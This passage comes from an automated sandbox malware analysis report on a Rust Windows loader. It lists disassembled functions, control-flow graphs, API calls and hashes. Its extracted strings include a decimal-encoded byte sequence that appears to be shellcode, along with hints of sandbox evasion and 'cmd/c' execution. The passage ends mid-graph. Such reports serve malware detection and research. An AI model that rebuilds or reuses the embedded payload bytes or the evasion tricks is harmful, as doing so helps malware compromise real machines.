7ff73a5c2fde 28337->28338 28339 7ff73a5c2e8e GetLastError 28337->28339 28340 7ff73a5c0700 19 API calls 28338->28340 28339->28342 28343 7ff73a5c2f72 28339->28343 28340->28343 28341 7ff73a5c2fc3 28341->28330 28342->28334 28342->28335 28342->28337 28342->28343 28345 7ff73a5c30cf 28342->28345 28346 7ff73a5c9a60 8 API calls 28342->28346 28343->28341 28344 7ff73a5c2fba CloseHandle 28343->28344 28344->28341 28345->28330 28346->28342 28347 266e7a40128 HttpOpenRequestA 28348 266e7a4014f 28347->28348 28349 7ff73a5c8c3a 28350 7ff73a5c0700 19 API calls 28349->28350 28351 7ff73a5c8c97 28350->28351

                                          Executed Functions

                                          Function 00007FF73A5C42F0 Relevance: 74.0, APIs: 35, Strings: 6, Instructions: 2274COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$EnvironmentExclusiveLockStrings$AcquireFreeReleasememmove
                                          • String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                          • API String ID: 91921124-3342424890
                                          • Opcode ID: da6b6af9308c99fcf1fed4def5d1a59358d9557ed4e4d659fa153940c1c744a7
                                          • Instruction ID: a5c76778d99de7e447226547f55912bdd5e3b8e86a5a6030683fbc31be93c9c0
                                          • Opcode Fuzzy Hash: da6b6af9308c99fcf1fed4def5d1a59358d9557ed4e4d659fa153940c1c744a7
                                          • Instruction Fuzzy Hash: 1F33B066A09BC198FB71AF24DC453FE67A0FB46789F805175DA8D4BB89DF389240D320
                                          Function 00007FF73A5C2940 Relevance: 8.0, APIs: 5, Instructions: 499COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1113 7ff73a5c2940-7ff73a5c299f 1114 7ff73a5c29a0-7ff73a5c29a9 GetCurrentProcessId 1113->1114 1115 7ff73a5c29bb-7ff73a5c29c5 1114->1115 1116 7ff73a5c2a10-7ff73a5c2aa3 call 7ff73a5a54b0 1115->1116 1117 7ff73a5c29c7-7ff73a5c29e2 BCryptGenRandom 1115->1117 1125 7ff73a5c2ab6-7ff73a5c2adf 1116->1125 1126 7ff73a5c2aa5-7ff73a5c2ab1 call 7ff73a5a72b0 1116->1126 1118 7ff73a5c29b0 1117->1118 1119 7ff73a5c29e4-7ff73a5c29ff call 7ff73a5c9a60 1117->1119 1121 7ff73a5c29b4 1118->1121 1119->1121 1121->1115 1127 7ff73a5c2ae1-7ff73a5c2aec 1125->1127 1128 7ff73a5c2b00-7ff73a5c2b0d 1125->1128 1126->1125 1130 7ff73a5c2b20-7ff73a5c2b32 1127->1130 1131 7ff73a5c2aee-7ff73a5c2af2 1127->1131 1132 7ff73a5c2bac-7ff73a5c2bc6 1128->1132 1134 7ff73a5c2b34-7ff73a5c2b46 1130->1134 1135 7ff73a5c2b78-7ff73a5c2b81 1130->1135 1133 7ff73a5c2b84-7ff73a5c2b89 1131->1133 1136 7ff73a5c3119-7ff73a5c313d call 7ff73a5a5460 1132->1136 1137 7ff73a5c2bcc-7ff73a5c2bea call 7ff73a5a72a0 1132->1137 1141 7ff73a5c2b8b-7ff73a5c2ba7 1133->1141 1139 7ff73a5c2f2d-7ff73a5c2f3e 1134->1139 1140 7ff73a5c2b4c-7ff73a5c2b71 1134->1140 1135->1133 1144 7ff73a5c3142-7ff73a5c317b 1136->1144 1149 7ff73a5c2bf0-7ff73a5c2c0c 1137->1149 1150 7ff73a5c30e6-7ff73a5c3117 call 7ff73a5dc170 1137->1150 1139->1133 1143 7ff73a5c2f44-7ff73a5c2f6d 1139->1143 1140->1133 1145 7ff73a5c2b73 1140->1145 1141->1132 1143->1141 1147 7ff73a5c3192-7ff73a5c31cb 1144->1147 1148 7ff73a5c317d-7ff73a5c318d call 7ff73a5a72b0 1144->1148 1145->1143 1148->1147 1152 7ff73a5c2c1a-7ff73a5c2c1d 1149->1152 1150->1144 1155 7ff73a5c2c90-7ff73a5c2c9c 1152->1155 1156 7ff73a5c2c1f-7ff73a5c2c22 1152->1156 1159 7ff73a5c2ca2-7ff73a5c2cba 1155->1159 1160 7ff73a5c2e40-7ff73a5c2e88 CreateNamedPipeW 1155->1160 1157 7ff73a5c2c70-7ff73a5c2c73 1156->1157 1158 7ff73a5c2c24-7ff73a5c2c26 1156->1158 1157->1155 1164 7ff73a5c2c75-7ff73a5c2c80 1157->1164 1161 7ff73a5c2c29-7ff73a5c2c2c 1158->1161 1165 7ff73a5c2d20-7ff73a5c2d27 1159->1165 1166 7ff73a5c2cbc-7ff73a5c2cc2 1159->1166 1162 7ff73a5c2fde-7ff73a5c2ff6 1160->1162 1163 7ff73a5c2e8e-7ff73a5c2ebc GetLastError 1160->1163 1167 7ff73a5c2c10-7ff73a5c2c17 1161->1167 1168 7ff73a5c2c2e-7ff73a5c2c61 1161->1168 1175 7ff73a5c3009-7ff73a5c3076 call 7ff73a5c0700 1162->1175 1176 7ff73a5c2ff8-7ff73a5c3004 call 7ff73a5a72b0 1162->1176 1169 7ff73a5c2f72-7ff73a5c2f8b 1163->1169 1170 7ff73a5c2ec2-7ff73a5c2ec5 1163->1170 1171 7ff73a5c2c86-7ff73a5c2c8b 1164->1171 1172 7ff73a5c2d8a-7ff73a5c2d9d 1164->1172 1177 7ff73a5c2d2f 1165->1177 1173 7ff73a5c30d4-7ff73a5c30d9 call 7ff73a5a5460 1166->1173 1174 7ff73a5c2cc8-7ff73a5c2cdd 1166->1174 1167->1152 1168->1166 1178 7ff73a5c2f9e-7ff73a5c2fa1 1169->1178 1179 7ff73a5c2f8d-7ff73a5c2f99 call 7ff73a5a72b0 1169->1179 1180 7ff73a5c2ed0-7ff73a5c2ed3 1170->1180 1181 7ff73a5c2ec7-7ff73a5c2ece 1170->1181 1171->1161 1183 7ff73a5c2de2-7ff73a5c2def 1172->1183 1184 7ff73a5c2d9f-7ff73a5c2db2 1172->1184 1173->1144 1185 7ff73a5c2cdf 1174->1185 1186 7ff73a5c2ce4-7ff73a5c2cf8 1174->1186 1189 7ff73a5c307b-7ff73a5c307e 1175->1189 1176->1175 1190 7ff73a5c2d37-7ff73a5c2d56 call 7ff73a5b70d0 1177->1190 1192 7ff73a5c2fb4-7ff73a5c2fb8 1178->1192 1193 7ff73a5c2fa3-7ff73a5c2faf call 7ff73a5a72b0 1178->1193 1179->1178 1180->1169 1195 7ff73a5c2ed9-7ff73a5c2edf 1180->1195 1194 7ff73a5c2ee5-7ff73a5c2f0b call 7ff73a5b2840 1181->1194 1197 7ff73a5c2df6-7ff73a5c2e07 1183->1197 1184->1197 1198 7ff73a5c2db4-7ff73a5c2dd9 1184->1198 1185->1186 1186->1177 1199 7ff73a5c2cfa-7ff73a5c2d11 1186->1199 1200 7ff73a5c3080-7ff73a5c3092 1189->1200 1201 7ff73a5c309d-7ff73a5c30b3 1189->1201 1214 7ff73a5c2d58-7ff73a5c2d65 1190->1214 1215 7ff73a5c2d7e 1190->1215 1206 7ff73a5c2fc3-7ff73a5c2fdd 1192->1206 1207 7ff73a5c2fba-7ff73a5c2fbd CloseHandle 1192->1207 1193->1192 1194->1114 1216 7ff73a5c2f11-7ff73a5c2f28 call 7ff73a5a72b0 1194->1216 1195->1169 1195->1194 1202 7ff73a5c2e09-7ff73a5c2e2a 1197->1202 1203 7ff73a5c2ddb 1197->1203 1198->1202 1198->1203 1199->1190 1200->1193 1209 7ff73a5c3098 1200->1209 1201->1206 1210 7ff73a5c30b9-7ff73a5c30ca call 7ff73a5a72b0 1201->1210 1202->1160 1203->1183 1207->1206 1209->1192 1210->1206 1218 7ff73a5c30cf-7ff73a5c30d2 1214->1218 1219 7ff73a5c2d6b-7ff73a5c2d72 1214->1219 1215->1172 1216->1114 1218->1173 1221 7ff73a5c30db-7ff73a5c30e4 call 7ff73a5dc170 1218->1221 1219->1215 1221->1144
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CryptCurrentProcessRandom
                                          • String ID:
                                          • API String ID: 2610850170-0
                                          • Opcode ID: 34a0955247d83eac62b8a961388032acfd715169d666cfece63e41b4b306121d
                                          • Instruction ID: cc301ee0efd40627517614133bd18a8284f0005c8d99165fcf59a90386c16d25
                                          • Opcode Fuzzy Hash: 34a0955247d83eac62b8a961388032acfd715169d666cfece63e41b4b306121d
                                          • Instruction Fuzzy Hash: BA221336A04A9199F764AF34C8023EDBBA0FB067ACF404275EA9D47BD9DF78D1459320
                                          Function 00007FF73A5C0E60 Relevance: 4.6, APIs: 3, Instructions: 84filenativesynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFileObjectSingleStatusWaitWrite
                                          • String ID:
                                          • API String ID: 3447438843-0
                                          • Opcode ID: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                          • Instruction ID: 36c6a8e704981293462ded8c9d538ec987b385bd9680ff4ee4947fcd768985ce
                                          • Opcode Fuzzy Hash: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                          • Instruction Fuzzy Hash: 19317436608B8196F760DB24F45136AB3A5FB85350F908135EADD43BA8DF7CD084CB10
                                          Function 00007FF73A591224 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 381timesleepsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 670 7ff73a591224-7ff73a591263 call 7ff73a5910dc 673 7ff73a591269-7ff73a59128a call 7ff73a591c90 670->673 674 7ff73a59165c-7ff73a591673 call 7ff73a5dc005 670->674 679 7ff73a591290-7ff73a5912c5 call 7ff73a5910dc 673->679 680 7ff73a5916f8-7ff73a591714 673->680 682 7ff73a59167c-7ff73a591693 call 7ff73a5dc005 674->682 679->682 689 7ff73a5912cb-7ff73a5912d4 679->689 681 7ff73a591732-7ff73a591748 call 7ff73a5db460 680->681 687 7ff73a59174d-7ff73a59179f call 7ff73a5db200 681->687 695 7ff73a59169c-7ff73a5916dd call 7ff73a5db770 682->695 694 7ff73a5917a4 687->694 691 7ff73a5912ff-7ff73a591302 689->691 692 7ff73a5912d6-7ff73a5912dc 689->692 693 7ff73a591304-7ff73a59131e call 7ff73a5a5000 call 7ff73a59c404 691->693 696 7ff73a5912df-7ff73a5912f0 692->696 714 7ff73a591322-7ff73a591326 693->714 698 7ff73a5917a6-7ff73a5917cd call 7ff73a5db580 694->698 706 7ff73a59145c-7ff73a591479 695->706 696->696 700 7ff73a5912f2-7ff73a5912fd 696->700 708 7ff73a5917cf call 7ff73a59d820 698->708 709 7ff73a5917d4-7ff73a5917e3 698->709 700->693 710 7ff73a5914b5-7ff73a5914bf 706->710 711 7ff73a59147b 706->711 708->709 712 7ff73a5914c1-7ff73a5914ca 710->712 713 7ff73a5914d4-7ff73a5914e0 710->713 716 7ff73a591482-7ff73a591486 711->716 712->698 717 7ff73a5914d0-7ff73a5914d2 712->717 718 7ff73a5916e2-7ff73a5916ee call 7ff73a5dbc80 713->718 719 7ff73a5914e6-7ff73a5914ef 713->719 720 7ff73a591328-7ff73a591338 call 7ff73a5910ae 714->720 721 7ff73a59133a-7ff73a59136b call 7ff73a59c404 call 7ff73a591c90 714->721 722 7ff73a5916f3 call 7ff73a5db720 716->722 723 7ff73a59148c-7ff73a591499 716->723 724 7ff73a5914f0-7ff73a59152c call 7ff73a592f70 717->724 718->722 719->724 720->714 743 7ff73a591371-7ff73a5913af call 7ff73a5a5220 call 7ff73a5910ae CreateWaitableTimerExW 721->743 744 7ff73a591716-7ff73a59172b 721->744 722->680 723->716 729 7ff73a59149b-7ff73a5914ae 723->729 736 7ff73a59156d-7ff73a591576 724->736 737 7ff73a59152e-7ff73a591531 724->737 729->710 741 7ff73a5915c2 736->741 742 7ff73a591578-7ff73a591596 736->742 739 7ff73a5915c5-7ff73a5915cf 737->739 740 7ff73a591537-7ff73a591568 call 7ff73a5db200 737->740 745 7ff73a5915d1-7ff73a5915df 739->745 746 7ff73a5915eb-7ff73a5915ee 739->746 740->694 741->739 748 7ff73a591598 742->748 749 7ff73a59159e-7ff73a5915ab 742->749 763 7ff73a5913b1-7ff73a5913db SetWaitableTimer 743->763 764 7ff73a591404-7ff73a591407 Sleep 743->764 744->681 745->746 754 7ff73a5915e1-7ff73a5915e5 WakeByAddressSingle 745->754 746->687 755 7ff73a5915f4-7ff73a591644 call 7ff73a5a4ee0 call 7ff73a5a5280 746->755 748->749 751 7ff73a5915b6-7ff73a5915bd call 7ff73a591ba0 749->751 752 7ff73a5915ad-7ff73a5915b1 call 7ff73a591ba0 749->752 751->741 752->751 754->746 769 7ff73a591649-7ff73a59165b 755->769 766 7ff73a5913fb-7ff73a5913fe CloseHandle 763->766 767 7ff73a5913dd-7ff73a5913f7 WaitForSingleObject CloseHandle 763->767 768 7ff73a59140d-7ff73a59144b 764->768 766->764 767->768 770 7ff73a5913f9 767->770 768->706 771 7ff73a59144d-7ff73a591456 768->771 770->764 771->695 771->706
                                          APIs
                                          Strings
                                          • stdoutstd\src\io\mod.rsfailed to write whole buffer, xrefs: 00007FF73A59142F
                                          • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF73A591737
                                          • crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102, xrefs: 00007FF73A59161F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandleSingleTimerWaitable$AddressCreateObjectSleepWaitWakememmove
                                          • String ID: called `Result::unwrap()` on an `Err` value$crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102$stdoutstd\src\io\mod.rsfailed to write whole buffer
                                          • API String ID: 2369806718-460783922
                                          • Opcode ID: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                          • Instruction ID: 8445de7a2196c05595203e63f5d53ca3e460e835a2bacd26d81ef1701a835a6f
                                          • Opcode Fuzzy Hash: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                          • Instruction Fuzzy Hash: 0602B03AA08B56A5FB51AF21E842BE8B361FB16798F804175EE5D0B794DF3CE085D310
                                          Function 00007FF73A5BC3D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 204synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 772 7ff73a5bc3d0-7ff73a5bc41c call 7ff73a5c42f0 775 7ff73a5bc422-7ff73a5bc43d 772->775 776 7ff73a5bc641-7ff73a5bc645 772->776 777 7ff73a5bc43f-7ff73a5bc443 CloseHandle 775->777 778 7ff73a5bc449-7ff73a5bc467 775->778 779 7ff73a5bc64c-7ff73a5bc662 776->779 777->778 780 7ff73a5bc469-7ff73a5bc473 778->780 781 7ff73a5bc4cd-7ff73a5bc4d0 778->781 782 7ff73a5bc515-7ff73a5bc53c call 7ff73a5c35a0 780->782 783 7ff73a5bc479-7ff73a5bc487 call 7ff73a5c3870 780->783 784 7ff73a5bc4d2-7ff73a5bc4f9 call 7ff73a5c35a0 781->784 785 7ff73a5bc54f-7ff73a5bc55f WaitForSingleObject 781->785 797 7ff73a5bc542-7ff73a5bc549 CloseHandle 782->797 798 7ff73a5bc695-7ff73a5bc6c0 call 7ff73a5dc660 782->798 794 7ff73a5bc48c-7ff73a5bc496 783->794 804 7ff73a5bc4ff-7ff73a5bc513 CloseHandle 784->804 805 7ff73a5bc663-7ff73a5bc693 call 7ff73a5dc660 784->805 786 7ff73a5bc561-7ff73a5bc574 GetLastError 785->786 787 7ff73a5bc5a6-7ff73a5bc5bc GetExitCodeProcess 785->787 792 7ff73a5bc576-7ff73a5bc580 call 7ff73a5a72b0 786->792 793 7ff73a5bc585-7ff73a5bc590 786->793 787->786 795 7ff73a5bc5be-7ff73a5bc5f1 787->795 792->793 801 7ff73a5bc592-7ff73a5bc59c call 7ff73a5a72b0 793->801 802 7ff73a5bc5a1-7ff73a5bc5a4 793->802 794->785 800 7ff73a5bc49c-7ff73a5bc4c8 call 7ff73a5dc660 794->800 803 7ff73a5bc5f5-7ff73a5bc60c CloseHandle * 2 795->803 797->785 813 7ff73a5bc6c5-7ff73a5bc70a CloseHandle 798->813 800->813 801->802 802->803 810 7ff73a5bc63e 803->810 811 7ff73a5bc60e-7ff73a5bc63c 803->811 804->785 805->813 810->776 811->779
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 17306042-2333694755
                                          • Opcode ID: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                          • Instruction ID: eb4502dd0d5073b28e3979325394e87a9475684a028074a1bcf76663d7b413b5
                                          • Opcode Fuzzy Hash: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                          • Instruction Fuzzy Hash: DD919F3AA04B86A9F721EF25E8417E9B360FB5A798F804572EE5C03B58DF38D185D350
                                          Function 00007FF73A5A5000 Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 347stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 815 7ff73a5a5000-7ff73a5a5020 816 7ff73a5a5026-7ff73a5a502c 815->816 817 7ff73a5a5175-7ff73a5a5186 815->817 816->817 818 7ff73a5a5032-7ff73a5a5039 816->818 819 7ff73a5a503f-7ff73a5a5065 call 7ff73a5a72a0 818->819 820 7ff73a5a5187-7ff73a5a518c call 7ff73a5a5460 818->820 825 7ff73a5a518e-7ff73a5a51dd call 7ff73a5dc170 call 7ff73a5a72b0 819->825 826 7ff73a5a506b-7ff73a5a507c 819->826 820->825 828 7ff73a5a509b-7ff73a5a50a2 826->828 829 7ff73a5a5080-7ff73a5a5082 828->829 830 7ff73a5a50a4-7ff73a5a50d0 strlen call 7ff73a5a7a60 828->830 834 7ff73a5a5085-7ff73a5a5099 829->834 830->834 834->828 835 7ff73a5a50d2-7ff73a5a50fd 834->835 838 7ff73a5a511b-7ff73a5a5126 835->838 839 7ff73a5a5110-7ff73a5a5119 838->839 840 7ff73a5a5128-7ff73a5a512f 838->840 839->838 841 7ff73a5a5149-7ff73a5a515e call 7ff73a5a72b0 839->841 842 7ff73a5a50ff call 7ff73a5aceb0 840->842 843 7ff73a5a5131-7ff73a5a5134 840->843 841->817 853 7ff73a5a5160-7ff73a5adcff call 7ff73a5bc890 call 7ff73a5b8570 841->853 850 7ff73a5a5104 842->850 846 7ff73a5a5142-7ff73a5a5147 call 7ff73a5ad4f0 843->846 847 7ff73a5a5136-7ff73a5a5139 843->847 846->839 847->839 851 7ff73a5a513b-7ff73a5a5140 call 7ff73a5ad8c0 847->851 850->839 851->839 862 7ff73a5add01-7ff73a5add0d call 7ff73a5acb70 853->862 863 7ff73a5add12-7ff73a5add3d call 7ff73a5bbcf0 853->863 870 7ff73a5add92-7ff73a5adda5 call 7ff73a5b7f90 862->870 868 7ff73a5add3f-7ff73a5add43 863->868 869 7ff73a5add74-7ff73a5add7e 863->869 868->869 871 7ff73a5add45-7ff73a5add6e 868->871 869->870 872 7ff73a5add80-7ff73a5add86 869->872 877 7ff73a5adf7f-7ff73a5adfb2 call 7ff73a5dc660 870->877 878 7ff73a5addab-7ff73a5ade08 call 7ff73a5bc230 call 7ff73a5b85b0 870->878 871->869 875 7ff73a5adf64-7ff73a5adf6e 871->875 872->870 876 7ff73a5add8d call 7ff73a5a72b0 872->876 879 7ff73a5adf70-7ff73a5adf7d 875->879 880 7ff73a5adf55-7ff73a5adf63 875->880 876->870 888 7ff73a5ae038-7ff73a5ae05e 877->888 892 7ff73a5adfb7-7ff73a5adfe9 call 7ff73a5dc660 878->892 893 7ff73a5ade0e-7ff73a5ade5b call 7ff73a5c40e0 memmove call 7ff73a5b8590 878->893 882 7ff73a5adf50 call 7ff73a5a72b0 879->882 882->880 890 7ff73a5ae060-7ff73a5ae074 call 7ff73a5a72b0 888->890 891 7ff73a5ae079-7ff73a5ae084 888->891 890->891 892->888 901 7ff73a5ade61-7ff73a5adebc call 7ff73a5c41d0 * 3 call 7ff73a5bc330 893->901 902 7ff73a5adfeb-7ff73a5ae003 call 7ff73a5dc330 893->902 912 7ff73a5adec1-7ff73a5adec8 901->912 902->888 913 7ff73a5ae005-7ff73a5ae033 call 7ff73a5dc660 912->913 914 7ff73a5adece-7ff73a5adf23 call 7ff73a5ad920 call 7ff73a5ada60 912->914 913->888 920 7ff73a5adf25-7ff73a5adf32 call 7ff73a5a72b0 914->920 921 7ff73a5adf37-7ff73a5adf41 914->921 920->921 921->880 923 7ff73a5adf43-7ff73a5adf49 921->923 923->882
                                          APIs
                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000001,00000000,?,?,00000000,?,00007FF73A59130C), ref: 00007FF73A5A50A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: strlen
                                          • String ID: Failed to open file$called `Result::unwrap()` on an `Err` valuebypass\tools\src\lib.rscmd/ccalled `Option::unwrap()` on a `None` value$sandbox1$sandbox2$sandbox3$start
                                          • API String ID: 39653677-2961894791
                                          • Opcode ID: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                          • Instruction ID: ba292ad396f3473248f9ac143367f3e74be55221a8d30d44f4107244b870c514
                                          • Opcode Fuzzy Hash: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                          • Instruction Fuzzy Hash: 07E1C62AB04AC2A8FB72AF25D8027F9B360FB56798F844171DE4D07695DF38D285D320
                                          Function 00007FF73A5DA434 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                          • String ID:
                                          • API String ID: 1133592946-0
                                          • Opcode ID: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                          • Instruction ID: a46ebcd158a849a34308db8838ebe9b6a95b683e429e5c4ea5085a52c0c3099b
                                          • Opcode Fuzzy Hash: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                          • Instruction Fuzzy Hash: 31314F6BA09103A5FA10BB2990573BBB651AF47784FC444F4EB6E472D7DE2CE405A370
                                          Function 00007FF73A5C3870 Relevance: 10.7, APIs: 7, Instructions: 180COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 975 7ff73a5c3870-7ff73a5c38b5 call 7ff73a5c3bf0 978 7ff73a5c38ca-7ff73a5c38fe call 7ff73a5c3bf0 975->978 979 7ff73a5c38b7-7ff73a5c38c5 CloseHandle 975->979 983 7ff73a5c3900-7ff73a5c3904 978->983 984 7ff73a5c3909-7ff73a5c3957 978->984 980 7ff73a5c3ae0-7ff73a5c3af6 979->980 985 7ff73a5c3ad3-7ff73a5c3adb call 7ff73a5b29b0 983->985 986 7ff73a5c3960-7ff73a5c3977 WaitForMultipleObjects 984->986 985->980 987 7ff73a5c39c0-7ff73a5c39c7 986->987 988 7ff73a5c3979-7ff73a5c397b 986->988 992 7ff73a5c3a50-7ff73a5c3a56 call 7ff73a5c3d10 987->992 993 7ff73a5c39cd-7ff73a5c39d0 987->993 990 7ff73a5c3981-7ff73a5c3988 988->990 991 7ff73a5c3a7c-7ff73a5c3a8c GetLastError 988->991 994 7ff73a5c3a17-7ff73a5c3a1d call 7ff73a5c3d10 990->994 995 7ff73a5c398e-7ff73a5c3991 990->995 999 7ff73a5c3aca-7ff73a5c3ace call 7ff73a5b29b0 991->999 1004 7ff73a5c3a5b-7ff73a5c3a5f 992->1004 997 7ff73a5c39d2-7ff73a5c39ef GetOverlappedResult 993->997 998 7ff73a5c3a37 993->998 1008 7ff73a5c3a22-7ff73a5c3a26 994->1008 1002 